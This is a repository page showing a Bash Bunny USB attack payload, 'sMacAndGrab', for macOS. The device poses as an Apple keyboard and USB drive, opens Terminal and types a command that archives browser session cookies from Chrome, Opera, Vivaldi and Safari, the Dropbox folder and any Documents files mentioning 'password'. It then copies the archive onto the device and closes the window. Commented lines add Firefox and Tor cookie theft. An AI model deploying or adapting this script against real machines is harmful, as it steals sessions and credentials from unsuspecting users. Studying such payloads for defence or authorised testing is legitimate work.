weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/exfiltration/SmacAndGrab/payload.txt
Alex Flores ca9e53c5a8 updates sMacAndGrab for bashbunny fw1.1 (#202)
2017-04-27 13:04:38 +10:00

61 lines
2.3 KiB
Bash
Raw Permalink Blame History

#!/bin/bash
#
# Title: sMacAndGrab
# Author: audibleblink
# Target: macOS
# Version: 1.2
#
# Backup a list of files from macOS
#
# Yellow (blinking)...Attacking
# Green...............Finished
LED ATTACK
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
# make the loot directory on the BashBunny
mkdir -p /root/udisk/loot/sMacAndGrab
# mounted device name
dev_name="BashBunny"
# loot directory when mounted on the mac
lootdir="/Volumes/$dev_name/loot/sMacAndGrab"
# Add files, folders, or commands that return filenames
files_to_copy=(
"\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces
"\"~/Library/Application Support/Google/Chrome Canary/Default/Cookies\"" #Grap Chrome Canary Cookies
"\"~/Library/Application Support/Chromium/Default/Cookies\"" #Grap Chromium Cookies
"\"~/Library/Application Support/com.operasoftware.Opera/Cookies\"" #Grab Opera Cookies
"\"~/Library/Application Support/com.operasoftware.OperaDeveloper/Cookies\"" #Grab Opera Developers Cookies
"\"~/Library/Application Support/Opera Neon/Default/Cookies\"" #Grab Opera Neon Cookies
"\"~/Library/Application Support/Vivaldi/Default/Cookies\"" #Grab Vivaldi Cookies
"\"~/Library/Cookies/Cookies.binarycookies\"" #Grab Safari Cookies
# Grab Firefox and Firefox-based Cookies with a written bash command to search for the default profile name
# Must be edited and escaped to match Bash Bunny Environment
####################################################
# 1. Firefox
# path=$(find "$HOME/Library/Application Support/Firefox/Profiles/" -maxdepth 1 -type d -name '*default*' -print0)
# file="$path/cookies.sqlite"
# cp "$file" ~/Desktop/Cookies/FirefoxCookies.db
####################################################
# 2. TOR (Firefox-based)
# path=$(find "$HOME/Library/Application Support/TorBrowser-Data/Browser" -maxdepth 1 -type d -name '*default*' -print0)
# file="$path/cookies.sqlite"
# cp "$file" ~/Desktop/Cookies/TORCookies.db
"~/Dropbox"
"\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET
)
QUACK RUN OSX terminal
QUACK DELAY 4000
# the more files in $files to copy, the longer tar will take to compress
# one-liner because we want the move command to wait for tar to finish
QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal
QUACK ENTER
LED FINISH
Reference in New Issue View Git Blame Copy Permalink